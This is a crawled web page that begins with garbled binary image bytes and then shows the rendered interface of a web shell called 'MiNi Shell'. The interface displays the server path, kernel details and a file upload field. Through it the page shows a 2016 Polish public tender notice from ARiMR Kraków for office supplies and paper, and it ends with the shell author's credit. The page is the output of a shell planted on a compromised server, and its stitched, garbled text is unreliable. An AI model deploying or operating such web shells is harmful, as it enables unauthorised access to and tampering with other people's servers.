JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160602/65615-N-2016.html

<p class="kh_header"><b>Kraków: Dostawa materiałów biurowych i papieru dla Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim</b><br>
<b>Numer ogłoszenia: 65615 - 2016; data zamieszczenia: 02.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Lubicz 25, 31-503 Kraków, woj. małopolskie, tel. 012 6298010, faks 012 4211311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja wykonawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i papieru dla Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa do siedziby Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim materiałów biurowych oraz papieru  w poniżej przedstawionych ilościach i asortymencie:
Lp.	Nazwa przedmiotu	Opis	J.m.	Ilość
1	Brulion-zeszyt A4/96 twarda oprawa	o pojemności minimum 96 kart, w kratę, z wysokiej jakości papieru, w twardej okładce	Szt.	100
2	Brulion-zeszyt A5/96 twarda oprawa	o pojemności minimum 96 kart, w kratę, z wysokiej jakości papieru, w twardej okładce	Szt.	100
3	Blok listowy - Notatnik A4	Pojemność minimum 80 kart w kratę, z dobrego gatunku papieru, z okładką sztywną, kartonową jako podkładką	Szt.	100
4	Blok listowy - Notatnik A5	Pojemność minimum 80 kart w kratę, z dobrego gatunku papieru, z okładką sztywną, kartonową jako podkładką	Szt.	100
5	Długopis jednorazowy niebieski 	Długopis jednorazowy z tuszem w kolorze niebieskim, Zakończenie i wentylowana skuwka w kolorze tuszu. Obudowa polistyrenowa, sześciokątna. Końcówka pisząca z węglika wolframu o średnicy 0,7 mm, grubość linii pisania 0,3mm. Ilość atramentu min. 0,4 g, długość linii pisania minimum 3500 m. Atrament na bazie oleju: trwały, wodoodporny, szybkoschnący (<2 s), gwarantujący płynność pisania.	Szt.	700
6	Długopis żelowy niebieski	Długopis żelowy. Na wkłady wymienne z igłową końcówką piszącą umożliwiającą rysowanie i kreślenie przy linijce i szablonie. Ergonomiczny uchwyt. Nasadka zaopatrzona w silikonową kulkę zabezpieczającą przed wysychaniem. Grubość linii pisania 0,27 mm do 33 mm w zależności od siły nacisku. Długość linii pisania min. 600-800 m.	Szt.	700
7	Długopis żelowy niebieski automat  	Długopis z wymiennym wkładem żelowym w kolorze niebieskim i gumowym uchwytem. Grubość linii pisania 0,32 mm, długość linii pisania min. 1200 m. Wyposażony w mechanizm chowania wkładu oraz zabezpieczenie przed poplamieniem ubrania. Z przezroczystą obudową pozwalającą kontrolować poziom tuszu. 
	Szt.	1000
8	Druk KP kasa przyjmie	Papier samokopiujący, format A6, blok minimum 80 kartek	Bl.	500
9	Druk - kwitariusz przychodowo-ewidencjyjny opłat	Kwitariusz przychodowo- ewidencyjny, format A4, druk samokopiujący, minimum 20 kartek	Szt.	500
10	Druk - książka kontroli	Format A4, druk dwustronny, zeszyt min. 40 stron.	Szt.	100
11	Kalkulator biurowy	wyświetlacz 12 pozycji, podwójne zasilanie, trwała plastikowa obudowa	Szt.	80
12	Klej biurowy w sztyfcie minimum 22g	Klej w sztyfcie do klejenia m.in. papieru, kartonu, nie zawiera rozpuszczalników, nie deformuje klejonej warstwy, usuwalny za pomocą wody, waga minimum 22 g	Szt.	1000
13	Koperta DL HK 110/220 z okienkiem prawym	Koperta samoklejąca z paskiem, format DL 110mmx220mm, biała, opakowanie minimum 1000 szt.	Op.	600
14	Tablica korkowa 80*50	Tablica korkowa o wymiarze 80x50 cm. Powierzchnia tablicy z naturalnego materiału korkowego. Tylna część tablicy wzmocniona pilśnią. Rama drewniana. Możliwość montażu tablicy w pionie lub poziomie. W komplecie zestaw do montażu tablicy.
	Szt.	80
15	Teczka biała archiw. wiązana A4 	Wykonana z grubego kartonu (min 350g/m2) do przechowywania dokumentów w składnicy akt, wyposażona w tasiemki, wewnątrz wyposażona w klapki zabezpieczające przed wypadaniem dokumentów, pojemność minimum 5 cm bieżących dokumentów.	Szt.	10 000
16	Zakładki index, notes samoprzylepny kolor*4	Zakładki indeksacyjne w 1 opakowaniu 4 kolory o wymiarach 20/50mm, w 1 opakowaniu min 200 szt., można je wielokrotnie odrywać i przyklejać w innych miejscach	Op.	600
17	Koszulka na dokumenty A4 	Wykonana z foli propylenowej grubości 45 ?m, przeznaczona na dokumenty w formacie A4, otwarta od góry, przezroczysta, antyelektrostatyczna, antyrefleksyjna, pasek z multiperforacją. Opakowanie 100 szt.	Op.	1 000
18	Koszulka na dokumenty A4 maxi poszerzana	Wykonana z folii propylenowej, przeznaczona na dokumenty w formacie A4, większy od standardowego rozmiar pozwalający na przechowywanie katalogów, cenników, ofert. Otwarta od góry, przezroczysta, antyelektrostatyczna, antyrefleksyjna, pasek z multiperforacją. Opakowanie minimum 25 szt.	Op.	500
19	Papier ksero format A4 80g/m2	Papier A4 do dokumentów tworzonych do wewnętrznego użytku firmy, oraz do czarno-białych dokumentów tekstowych, zalecany do drukarek laserowych i kopiarek, możliwość jedno i dwustronnego kopiowania, gramatura 80g/m2, białość CIE 146( +/-3)-opakowanie -ryza zawiera 500 arkuszy.	ryza	4 000
20	Papier ksero format A3	Papier A3 do dokumentów tworzonych do wewnętrznego użytku firmy, oraz do czarno-białych dokumentów tekstowych, zalecany do drukarek laserowych i kopiarek, możliwość jedno i dwustronnego kopiowania, gramatura 80g/m2, białość CIE 146( +/-3)-opakowanie -ryza zawiera 500 arkuszy.	ryza	100

21	Pudło archiwizacyjne (25*34*18) IRZ wraz z pokrywą (średnie)	Wykonane z twardej tektury falistej, otwierane z góry, z przykrywką, na dokumenty formatu A4 i A5, wymiary zewnętrzne po złożeniu: głębokość 340 mm, szerokość 250 mm, wysokość 180 mm), pokrywa dostosowana do wymiarów pudła.	Szt.	800
22	Pudło archiwizacyjne (25*30*17,50) IRZ wraz z pokrywą (małe)	Wykonane z twardej tektury falistej, otwierane z góry, z przykrywką, na dokumenty formatu A4 i A5, wymiary zewnętrzne po złożeniu: głębokość 300 mm, szerokość 250 mm, wysokość 175 mm), pokrywa dostosowana do wymiarów pudła.	Szt.	800
23	Pudło archiwizacyjne pełne boxy (8*25*35)	Wykonane z twardej tektury falistej, po złożeniu stabilne i trwałe, dostosowane do przechowywania dokumentów formatu A4 spiętych w teczki archiwizacyjne, posiadające otwór na palec ułatwiający wkładanie i wyjmowanie pojemnika z półki, miejsce do opisu zawartości pojemnika na grzbiecie, dłuższa zakładka na grzbiecie uniemożliwiająca samodzielne otwieranie (wymiary zewnętrzne po złożeniu: głębokość 250 mm, szerokość 80 mm, wysokość 350 mm)	Szt.	3000
24	Taśma pakowa 	Wykonana na kleju z kauczuku syntetycznego, w kolorze brązowym, przeznaczona do zaklejania kartonów, średnica wewnętrzna taśmy 75 mm	Szt.	400
25	Teczka z gumką 15mm cienka (kolorowa)	Wykonana z grubego kartonu (min 350g/m2)	Szt.	300
26	Wkład do kubika z kubikiem	Kubik plastikowy około 90mm*90mm*81mm z wkładem, wkład nie klejony, luzem.	Szt.	300
27	Teczki akt osobowych grube 45-50 mm	Wykonana z folii PCV, wyposażona w mechanizm 2-ringowy, na grzbiecie kieszeń na dane personalne, grzbiet 45-50 mm, z wkładem A B C	Szt.	200
28	Tusz do stempli zielony	Uniwersalny tusz wodny do papieru i dokumentów, przeznaczony do stempli i automatów samotuszujących, do stempli z gumową lub polimerową płytką stemplującą, pojemność buteleczki minimum 25 ml	Szt.	200
29	Przybornik na biurko	Pojemnik na podręczną galanterię biurową pozwalającą na organizację pracy na biurku	Szt.	80
30	Organizer telefoniczny	stołowy moduł na panele A4. Poprzez nasuwane z boku moduły do rozbudowy, możliwe obustronne powiększenie  do 100 paneli, z trwałego, odpornego na zarysowanie tworzywa sztucznego stabilny.	Szt.	10
31	Segregator A4/75 kolor	Do codziennego użytku w biurze, wykonany z twardej tektury pokrytej folią, z mechanizmem dźwigniowym, kolory dowolne, na grzbiecie miejsce na wsuwaną etykietę i otwór na palec do wysuwania z półki	Szt.	1 000
32	Skoroszyt A4 op. 20 szt	Skoroszyt twardy zawieszany- folia PVC, przód twardy przezroczysty, tył twardy kolorowy, boczna perforacja umożliwiająca wpięcie do segregatora z dowolnym ringiem, w środku blaszka i wąs o długości 16,5 cm, umożliwiający wpięcie dokumentów do 2 cm, format A4, różne kolory	Op.	350
33	papier do plotera atramentowego błyszczący	szer. wałka 914 mm, fotograficzny błyszczący, gramatura min. 180g/m2, rolka min. 30 m	Op.	10
34	papier do plotera atramentowego matowy	szer. wałka 914 mm, wodoodporny papier fotograficzny o wysokiej chłonności, gramatura min. 180 g/m2, rolka min. 30 m	Op.	10
35	papier do plotera atramentowego 	szer. wałka 914 mm, wodoodporny papier fotograficzny o wysokiej rozdzielczości, gramatura min. 120 g/m2, rolka min. 30m	Op.	10
36	Zszywki 10mini	Minimum 1 000 sztuk w opakowaniu	Op.	50
37	Dziurkacz archiwizacyjny duży	Dziurkuje do minimum 300 kartek, możliwość wymiany części eksploatacyjnych: bolcy tnących i podkładki. Wyposażony w duży uchwyt dla łatwiejszego dziurkowania dużych plików. Podstawa i dźwignia metalowe. regulowana głębokość wsuwania kartek. Metalowa listwa formatowa (dla formatów B6 do A3). Głębokość wsuwania kartek: minimum 12 mm. Odległość między dziurkami: 80 mm
	Szt.	2
38	Zestaw pióro + długopis	Długopis + pióro wieczne, wykonane w całości ze stali, w odcieniu szarym. Prosty klasyczny kształt.  Zestaw zapakowany w etui.
	Kpl.	23.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.22.21-5, 30.19.73.00-9, 30.19.21.00-2, 30.14.12.00-1, 24.91.00.00-6, 30.23.74.30-2, 30.19.21.30-1, 30.19.95.00-3, 30.19.72.00-8, 30.19.21.33-2, 39.29.50.00-0, 22.60.00.00-6, 30.12.44.00-8, 30.19.71.30-6, 30.19.28.00-9, 44.61.71.00-9, 30.19.92.30-1, 22.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
- działania siły wyższej lub wystąpienia stanu wyższej konieczności,
- wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach,
- niezależnych od wykonawcy okoliczności, które uniemożliwiają dostawę całości lub części asortymentu w terminie wskazanym przez Zamawiającego,
- zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
- zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
- omyłek pisarskich lub błędów rachunkowych,
-  mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-  jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
- innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2016 godzina 11:00, miejsce: Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków, Dziennik Podawczy, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com